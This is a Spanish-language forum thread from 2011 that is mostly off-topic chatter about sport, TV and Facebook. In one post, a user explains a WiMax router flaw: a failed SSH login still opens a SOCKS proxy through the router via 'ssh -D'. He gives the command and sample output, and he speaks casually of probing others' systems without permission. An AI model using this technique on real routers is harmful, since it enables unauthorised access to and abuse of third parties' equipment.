Mensajes: 5,133
Registro en: Jul 2007
Reputación:
131
(07-09-2011, 08:06 PM)Reboot escribió: (07-09-2011, 07:50 PM)Reaper45 escribió: vulnerabilidad en routers Wimax
Esos son los que da telefónica, ¿no? ¿No se supone que las últimas versiones del firmware lo habían arreglado?
No tiene nada que ver WiMax con Telefónica.
Mayor fan de Artanis :3
Mensajes: 5,823
Registro en: Sep 2009
Reputación:
27
Me pregunto cuanto de esa vuelta al mundo vitual se debe a super conocimientos juaker y cuanto a un directorio llamado "Tus primeras incursiones como script-kiddie"
Dicho sea todo sin la menor acritud. El aburrimiento es malo y todas las formas de combartirlo legítimas.
Mensajes: 1,241
Registro en: May 2007
Reputación:
83
ANLIUM pero ayer fue el meeting de atletismo de Madrid en el que estuve como voluntario del area técnica, recogiendo las mediciones de distancias en lanzamiento de martillo, jabalina y disco y actualizando los marcadores. Si alguna vez tenéis la oportunidad de poder participar en la organización de un evento de este tipo no la desaproveches porque es una experiencia.
PD: Grande Sergio Sanchez. un carrerón.
http://www.as.com/mas-deporte/articulo/s...imas_1/Tes
"No habrá más ofrendas, ni de hijos ni de padres. No habrá más sacrificios. Ha pasado el tiempo de la obediencia y la expiación. ¡Ayúdanos como amigo o lárgate!"
Mensajes: 1,669
Registro en: Mar 2009
Reputación:
41
07-10-2011, 01:46 PM
(Este mensaje fue modificado por última vez en: 07-10-2011, 01:48 PM por X51.)
ANLUPM pero
Vic Mackey >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Zero
Con Vic CG hubiese molado en vez de ser la chufa que es. De verdad que le tengo hincha porque me contaron maravillas de la serie y vaya tela, vaya tela.
Mensajes: 4,185
Registro en: Aug 2009
Reputación:
50
07-10-2011, 04:50 PM
(Este mensaje fue modificado por última vez en: 07-10-2011, 04:52 PM por Reaper45.)
(07-09-2011, 08:06 PM)Reboot escribió: (07-09-2011, 07:50 PM)Reaper45 escribió: vulnerabilidad en routers Wimax
Esos son los que da telefónica, ¿no? ¿No se supone que las últimas versiones del firmware lo habían arreglado?
Nop. No hablamos de lo mismo. Y no creo que Telefónica tenga presencia en Baréin xD.
La vulnerabilidad es muy sencilla.
Cuando intentas acceder por SSH, puedes poner un user/pass erróneo, que el servidor te lo pide de nuevo, pero lo hace usando un programa interno, lo que significa que el canal ya está abierto y ha dado el login SSH por válido aunque aparentemente aún no puedas hacer nada. Esto es una tontería, porque la especificación SSH te permite que la uses de proxy para conexiones cuando ya te has logueado. Tiene toda la pinta de que eso se le pasó al ingeniero.
Se hace así:
Código:
root@Reaper# ssh loquesea@iprouter -D 50000
The authenticity of host '[IP] ([IP])' can't be established.
RSA key fingerprint is 08:f6:5d:0c:75:3e:71:a5:8e:ea:68:4f:41:ef:ec:73.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'iprouter' (RSA) to the list of known hosts.
loquesea@iprouter's password:
login failed: please enter correct username and password
Login:
Ahora tienes un proxy socks ejecutándose en el puerto 50000 en localhost, con configurar firefox para usarlo todas las conexiones que se hagan aparecerán con la IP del router.
(07-09-2011, 10:46 PM)Yumichan escribió: Me pregunto cuanto de esa vuelta al mundo vitual se debe a super conocimientos juaker y cuanto a un directorio llamado "Tus primeras incursiones como script-kiddie"
Seré breve, ya que no me gusta explicarme y no sería la primera vez.
Bueno, pues digamos que la inspiración viene a ratos y que pocas veces es necesaria. De todas formas, yo llamo script-kiddie a los attention whores que fanfarronean, hacen defaces, tienen botnets para DDoS, que no saben hacer nada solos, no aportan nada y que, eventualmente, son cazados.
Personalmente encuentro muy divertido trastear con nuevos sistemas, a ver qué me encuentro, y después hacer el ninja y desaparecer sin tocar nada. ¿Para qué me voy a molestar en nada más? La gente no suele responder bien a ello.
A eso es a lo que se expone un "sombrero blanco", a que le llamen terrorista y/o script kiddie mientras observa cómo un elefante rosa gigantesco se bebe el café de la persona con la que está hablando sin que ésta se dé cuenta.
Mensajes: 5,823
Registro en: Sep 2009
Reputación:
27
XD, que conste que no te llamé terrorista , pero reformulo mi pregunta qué quizas sea ofensiva por lo de "kid".
Me sigo preguntando cuanto se debe a buscar un blanco por pasión por la tessnología, ego o afán de superación propia (o mix de ambas) y tratar de entrar (sin daños ni alardes públicos), y por contra cuanto se debe a "consultar vulnerabilidades del día" en la Web X o canal IRC Y e ir viendo cuantas caen...
Mensajes: 4,185
Registro en: Aug 2009
Reputación:
50
07-10-2011, 06:03 PM
(Este mensaje fue modificado por última vez en: 07-10-2011, 06:03 PM por Reaper45.)
Tranqui, no es ofensivo. Respondiendo a tu pregunta, el ego y la superación propia... pueden valer, pero siempre se ha dicho que los mejores son los que pasan desapercibidos. Siguen siendo inofensivos por que cuando se aburren se van a otra parte. Me cuento entre ellos.
Con respecto a lo otro, Internet está repleta de demasiadas cosas. Protegerlas a todas es cuestión de cambiar la personalidad de todos sus propietarios. Eso no lo veo viable. Las cuatro o cinco veces que he hecho de sombrero blanco o me ha salido como el culo o me han ignorado por completo, y yo acojonado por haberme delatado (true story). Luego pasa lo que tiene que pasar, y entonces pienso que se ha hecho justicia divina.
Mensajes: 1,165
Registro en: Mar 2008
Reputación:
57
ANLIUM pero el grupo de facebook de AU está lleno de hoyganes...
Mensajes: 1,772
Registro en: May 2007
Reputación:
46
(07-10-2011, 08:50 PM)JoeyDrill escribió: ANLIUM pero el grupo de facebook de AU está lleno de hoyganes...
Mensajes: 857
Registro en: Aug 2007
Reputación:
41
Y estoy trolleando a uno de ellos en estos momentos.
|